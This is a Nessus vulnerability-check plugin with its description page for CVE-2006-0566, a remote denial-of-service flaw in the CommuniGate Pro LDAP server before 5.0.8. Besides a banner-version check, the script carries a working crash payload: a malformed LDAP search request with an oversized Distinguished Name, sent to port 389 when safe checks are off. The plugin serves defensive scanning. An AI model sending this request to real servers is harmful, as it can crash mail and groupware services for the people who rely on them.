CommuniGate Pro Server < 5.0.8 LDAP Module Field Handling Remote DoS

2006-02-13T00:00:00
ID COMMUNIGATEPRO_508_LDAP_DOS.NASL
Type nessus
Reporter Tenable
Modified 2018-11-15T00:00:00

Description

The remote host appears to be running CommuniGate Pro, a commercial email and groupware application.

The version of CommuniGate Pro installed on the remote host includes an LDAP server that fails to handle requests with Distinguished Names (DNs) that contain too many elements. A user can leverage this issue to crash not just the LDAP server, but also the entire application on the remote host.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(20889);
  script_version("1.21");
  script_cvs_date("Date: 2018/11/15 20:50:26");

  script_cve_id("CVE-2006-0566");
  script_bugtraq_id(16501);

  script_name(english:"CommuniGate Pro Server < 5.0.8 LDAP Module Field Handling Remote DoS");
  script_summary(english:"Checks for denial of service vulnerability in CommuniGate Pro < 5.0.8 LDAP module");
 
  script_set_attribute(attribute:"synopsis", value:
"The remote application is prone to denial of service attacks.");
  script_set_attribute(attribute:"description", value:
"The remote host appears to be running CommuniGate Pro, a commercial
email and groupware application. 

The version of CommuniGate Pro installed on the remote host includes
an LDAP server that fails to handle requests with Distinguished 
Names (DNs) that contain too many elements.  A user can leverage this 
issue to crash not just the LDAP server, but also the entire 
application on the remote host.");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2006/Feb/54");
  script_set_attribute(attribute:"see_also", value:"http://www.stalker.com/CommuniGatePro/History.html");
  script_set_attribute(attribute:"solution", value:"Upgrade to CommuniGate Pro version 5.0.8 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"vuln_publication_date", value:"2006/02/04");
  script_set_attribute(attribute:"plugin_publication_date", value:"2006/02/13");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe",value:"cpe:/a:communigate:communigate_pro_core_server");
  script_end_attributes();
 
  script_category(ACT_MIXED_ATTACK);
  script_family(english:"Windows");
  script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.");

  script_dependencies("smtpserver_detect.nasl", "ldap_detect.nasl");
  script_require_ports("Services/smtp", 25, "Services/ldap", 389);

  exit(0);
}


include("global_settings.inc");
include("smtp_func.inc");


ldap_port = get_kb_item("Services/ldap");
if (!ldap_port) ldap_port = 389;
if (!get_port_state(ldap_port)) exit(0);


smtp_port = get_kb_item("Services/smtp");
if (!smtp_port) smtp_port = 25;
if (!get_port_state(smtp_port)) exit(0);
banner = get_smtp_banner(port:smtp_port);


# Unless we're paranoid, make sure the SMTP banner looks like CommuniGate Pro.
if (report_paranoia < 2) {
  if (!banner || "ESMTP CommuniGate Pro" >!< banner) exit(0);
}


# If safe checks are enabled...
if (safe_checks()) {
  # Check the version number in the SMTP banner.
  if (
    banner && 
    egrep(pattern:"^220 .* CommuniGate Pro ([0-4]\.|5\.0\.[0-7])", string:banner)
  ) {
    report = string(
      "Nessus has determined the flaw exists with the application\n",
      "simply by looking at the version in the SMTP banner.\n"
    );

    security_warning(port:ldap_port, extra:report);
    exit(0);
  }
}
# Otherwise try to crash it.
else {
  # A bad request.
  req = raw_string(
    0x30,                              # universal sequence
    0x82, 0x02, 0x38,                  # length of the request
    0x02, 0x01, 0x01,                  # message id (1)
    0x63,                              # search request
    0x82, 0x02, 0x31,                  #   length
    0x04, 0x82, 0x02, 0x15,            #   search term
      "dc=", crap(data:",", length:513), 
      "dc=example,dc=com",
    0x0a, 0x01, 0x02,                  #   scope (subtree)
    0x0a, 0x01, 0x00,                  #   dereference (never)
    0x02, 0x01, 0x00,                  #   size limit (0)
    0x02, 0x01, 0x00,                  #   time limit (0)
    0x01, 0x01, 0x00,                  #   attributes only (false)
    0xa2, 0x05, 0x87, 0x03,            #   filter (!(foo=*))
      "foo", 0x30, 0x00
  );

  # Open a socket and send the request.
  soc = open_sock_tcp(ldap_port);
  if (soc) {
    send(socket:soc, data:req);
    res = recv(socket:soc, length:1024);
    close(soc);

    # If we didn't get anything back, check whether it crashed.
    if (res == NULL) {
      soc2 = open_sock_tcp(ldap_port);
      # There's a problem if we can't reconnect.
      if (!soc2) {
        security_warning(ldap_port);
        exit(0);
      }
      else close(soc2);
    }
  }
}